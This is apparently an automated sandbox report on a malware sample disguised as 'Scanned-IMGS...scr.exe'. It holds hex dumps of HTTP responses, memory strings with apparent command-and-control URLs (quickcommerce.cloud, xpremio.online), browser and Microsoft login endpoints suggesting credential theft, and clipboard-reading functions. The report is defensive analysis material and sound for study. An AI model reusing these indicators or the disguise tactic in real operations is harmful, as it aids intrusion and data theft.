0c 17 cf 52 fc 71 fc ed ec 03 14 b9 d6 c0 db 49 bf 02 44 e6 59 5a ba f7 61 ea 65 37 07 7d 95 2b 7b 69 6f 7b 5f 2d 2f 2b ab aa 4b a0 1d c7 bd 59 7c 41 cd b3 fa 49 04 f9 97 3f 5a 5d b8 56 99 a5 9f af c7 c8 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 05 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 c6 38 4d d0 ef a7 bd 8e 4d 2e ed 6d ec ea 94 b7 1c 59 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 c7 f8 27 40 bb d6 c7 0d f5 17 1c ef b3 aa ca 92 87 41 bf c7 db 61 7b 79 5d 61 09 1d 5e 0f 5e 49 e2 1d fd 5b 31 f4 ea be 77 5c 3b 2b ac 5e 7f 0f 03 e0 52 dc a2 77 42 ef 37 7a 95 38 f0 47 0c 7b a5 8d 4f f7 79 08 b2 c6 2d ae f0 f5 9e 8d 07 2f b3 eb f2 f3 61 0b f8 99 e6 d6 72 5e 99 c0 e8 21 31 1e be 31 78 c5 c4 e7 28 7e f5 6b 1f 29 ea 17 c4 58 c7 37 ba f9 6e 69 61 7a f1 d9 1f f8 bc 38 2c ab fb 4b 58 e9 01 9f ba 83 ac ae ca 10 38 84 fe e3 8d fd 5e 91 af dc dd 38 e3 ef f0 ba ea 7f 3b 2d e0 29 0e 6f d8 f2 e2 ac b7 af de 33 be df e1 a2 69 2b 0e 7d a0 64 1b dc 10 dc e2 6d fc 8d e4 d7 1b bb 79 01 fd 47 3b 5d 02 2e 88 51 9f f9 b0 de 11 dc 87 89 e5 df aa f1 fb a1 3e f5 bd 97 a5 fd 2d 07 04 a8 db f3 f5 31 b7 7d 89 8f fb 2c 76 de 4e d1 cb f1 fa 94 3f ca a0 cd 0a e7 7e 0f 30 12 81 18 d5 ff b9 b7 e2 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Tue, 14 Jan 2025 09:25:25 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 13 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e5 7c fb ed f2 98 b8 95 05 46 54 f9 bd 7b ac c3 e6 e9 8e cd d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 56 51 ba d5 53 5d 79 f7 d4 dd a7 74 2c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 5a 58 7e 62 fd 23 33 f8 2e 0f 0b b7 bc 9a 82 bc a3 9e 5a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c5 f7 a5 6d c5 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 25 ab 06 93 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 19 da bf f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 cb 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 9c 56 86 67 f7 61 80 12 79 f7 be 33 0e 53 f7 3e 70 43 3f a8 40 f7 57 02 a3 c8 11 4a 60 e3 f7 a3 f6 96 1d f9 45 bf 07 a0 a2 38 2b 1e 06 ff ec 5d da fb 61 af 7d d8 04 c7 70 e4 7d 5f 6e 39 4e 98 fa 0f 83 9b ef 89 55 f8 61 fa ee f3 7f 7e 67 bf 74 ed 2a cc d2 2f 60 eb 59 e5 16 37 f2 70 c2 32 8f 2d 20 8b 7d 9c d9 d1 ff c1 72 5f 7b fc 59 40 22 b7 2b 3d 33 79 1f bb 1e 90 92 55 57 d9 fb c5 5e ba 8b 67 29 fe d8 ff b6 f7 01 8a 5c 6b e0 6d a7 5f 01 22 f3 2c 2d dd fb 30 f5 b2 9b 8d be ca 95 bd b4 b7 b5 af a6 97 95 55 d5 25 d0 8e e3 de 4c be a0 e6 59 fd 24 82 fc cb 1f cd 2e 5c ab cc d2 cf e7 63 e4 f5 fc 1e 92 9f a9 e0 8a b3 8b 4c ed ea b2 af 2f df 35 0b f6 db af 75 df 3b 8a 9b 05 5f 77 8b 5c da 87 fc f6 58 ea 81 01 0c ef 03 71 5d a1 b5 70 73 d7 02 3a 03 6e e4 f9 f1 8d 5c cf fe d5 c8 d7 55 b1 31 4e 13 f4 fb 61 af 7d 93 4b 7b eb bb da e5 2d 47 d6 27 9b fa 75 12 f7 61 e5 26 e5 0d 99 ef 48 c2 00 8e 7e 30 a5 30 7d 33 e5 31 fe 09 d0 ae f5 71 43 fd 05 c7 fb ac aa b2 e4 61 d0 af f1 b6 d9 5e 5e 57 58 42 87 d7 9d 57 92 78 47 ff 56 0c bd ba ef 1d d7 ce 0a ab d7 df c3 00 b8 14 b7 e8 9d d0 fb 85 5e 25 0e fc 11 c3 5e 69 e3 d3 75 1e 82 ac 71 8b 2b 7c bd 67 e3 c1 cb ec ba fc bc db 02 7e a6 b9 b5 9c 57 26 30 7a 48 8c 87 6f 0c 5e 31 f1 39 8a 5f fd da 47 8a fa 05 31 d6 f1 8d 6e be 5b 5a 98 5e 7c f6 07 3e 2f 0e cb ea fe 12 56 7a c0 a7 ee 20 ab ab 32 04 0e a1 7f 79 63 bf 57 e4 2b 77 37 ce f8 3b bc ae be bf ed 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df af 70 d1 b4 15 87 3e 50 b2 0d 4e 08 6e f1 d6 ff 46 f2 eb 8d dd bc 80 fe a3 95 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f2 6f d5 f8 7d 53 9f fa de cb d4 fe 94 03 02 d4 ed fe fa 98 db be c4 c7 7d 16 3b 6f bb e8 e5 78 bd cb 1f 65 d0 66 85 73 bf 07 18 89 40 8c ea 7f ee ad 38 7e 4f e0 97 76 05 82 3a 00 f7 00 c
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Tue, 14 Jan 2025 09:25:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:55 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:25:58 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:26:00 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jan 2025 09:26:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:26:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pt32mz4Hjf5wEYEo84%2FdHhvMrBqOd9qGOnyw2tkOof0KdwmNOSE8nVKByZycViJhT%2F82LZwvB6SZcNzltYxE6tBD0Icnv1pfWwHcmjNspDZy4qrksAN6UH9zvhU%2BsLUlWyoafdocWILSdJf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901c953158fa4309-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:26:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901c95414d2ede92-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:26:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901c95414d2ede92-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:26:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbP2NoBQfclcAsHdBnv16qAEYZDiHZ188yjA%2BJczaFFo9aSzii9rYnhH2qSVZZfPYZSrjsIcgTNLb9oUkIzq%2B3%2BAC0RzvC7koCGhtCvF1t8Z2IYjInbVRQzJXHlSSuJVN%2FH9BJe8oGaz%2BKm%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901c955129674304-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10829&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 09:26:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzaA1sj8tH4vEN1ikzeHVNTgk3%2BFvNQpBorj0w%2Frdj2W7%2FKHomoVCySaB5gc9KlsJ8ilVVUNucfOwUT0vE7CQcRtnv25WQrLx3rwHQGrKeBkvI3x63jbORSdYv2e%2BAdyeIkMvQJlnEoUCs9E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901c95612cfd1a30-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: verclsid.exe, 00000003.00000002.3550509142.00000000060BC000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.0000000003D6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: verclsid.exe, 00000003.00000002.3550509142.0000000006A28000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.00000000046D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/L
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3551901085.00000000057C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xpremio.online
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3551901085.00000000057C6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xpremio.online/8vp1/
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Ia)a
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.00000000033A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: verclsid.exe, 00000003.00000003.2016552884.000000000805D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004CEAFF
